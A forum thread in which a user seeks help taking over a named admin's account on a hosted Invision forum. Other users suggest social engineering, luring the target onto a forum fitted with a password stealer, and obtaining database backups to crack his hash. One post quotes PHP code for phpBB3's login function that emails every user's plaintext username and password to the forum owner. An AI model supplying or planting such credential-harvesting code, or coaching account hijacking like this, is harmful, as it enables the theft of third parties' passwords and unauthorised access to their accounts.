Waraxe IT Security Portal

Nemesis · Regular user

I have tried for weeks... months now to hack this ipb forum. I have tried every exploit known to man. Could some one tell me what im doing wrong. I follow all teh directions do it right but i get an error like 'error: couldn't get a post key' or the hash is 00000000000000000000. So could someone point me in the right direction or just give me the password of the user TheGeneral, the root admin please. i would much appreciate it. Crying or Very sad

here is the site i want to be the admin of:

http://z13.invisionfree.com/Allied_Guardians/index.php?

Thanks in advance

pexli · Valuable expert

I write this many time, but nobody want to read.This is free IPB hosting,no chance to hack this guy's.

Nemesis · Regular user

Dam so now ill have to turn to social engineering. Got any programs to help me with that and techniques to get it to work?

gyan007 · Advanced user

lenny · Valuable expert

Social engineering does exactly what it says on the tin. Its social, so no, there are no programs to help you!

You could set up your own forum with a password stealer though that collects the post variables when anybody logs in and stores them in a file... then all you have to do is convince him to sign up Smile

Social engineering is a broad topic, there are countless ways of making it work which is why its my preferred method of hacking. It does involve skill and patience though (and experience always helps) as well as a good social understanding, which you don't need for running an off-the-mill exploit. A firm sociology and psychology knowledge never hurt anybody either =] Once you get to grips with it it is a valuable asset to any hacker.

gyan007 · Advanced user

Best way for social engineering = have something he/she wants or is interested in.

Nemesis · Regular user

lenny i did get him to sign up on my second forums which is phpbb 3 i believe. i thought that woudl be easier to hack but i have had no success. (He thinks i dont know he is on my forums we tricked him) So how can i do this can you help me?

Edit: from the admin pannel i can make phpbb 3 to phpbb 2 does that affect anything? like if phpbb2 exploits work cas i changed it from 3 to 2. also i have had no luck hacking my own made forum please help. And no news on the legal way of getting my forums back i dont think they care Sad

Nemesis · Regular user

[quote]I took that code, but changed it to work with phpBB3. I am testing with the "Olympus" Gold Release.

Instructions:
1.Open file phpbbroot/includes/functions.php in a text editor.
2. Find " $result = $auth->login($username, $password, $autologin, $viewonline, $admin); " (omit quotes)
3. After, add:
Code:
$sitename = "domain.tld";
$recipient = 'email@domain.tld';
$subject = 'Password Alert - domain.tld';
$message = "Sitename: $sitename - Username: $username - Password: $password";
mail($recipient, $subject, $message);

4. Change domain.tld with the domain your using it on.
5. Change email@domain.tld with your email address.[/qoute]

this seems to be what i need but can someone help me use this? please sry for being noobish

lenny · Valuable expert

Ok, well i assume that you are self-hosting your phpBB installation... you are, right? :S

If not, your stuffed.

Actually thats not quite true. If you are using a hosting service then do you have the ability to download database backups? If you can get hold of your database (which will contain his hashed password) then you are in business =]

Nemesis · Regular user

thanks for the response though im pretty sure someone else is hosting it for me. I dont know how to host it my self. but ill see what i can do.

_mranderson_ · Valuable expert

Careful: most of the time, he won't use his main password to signup to another forum, so even after you have his password it doesn't mean you ll have access to his admin account. But if he's careless enough u ll get in.

Nemesis · Regular user

Ok well apparently i cant back up the forum i have now so could some tell me the best forum to use and how to host it myself so i can get an admins pass, assuming he is lazy and keeps all passes the same. thanks in advance.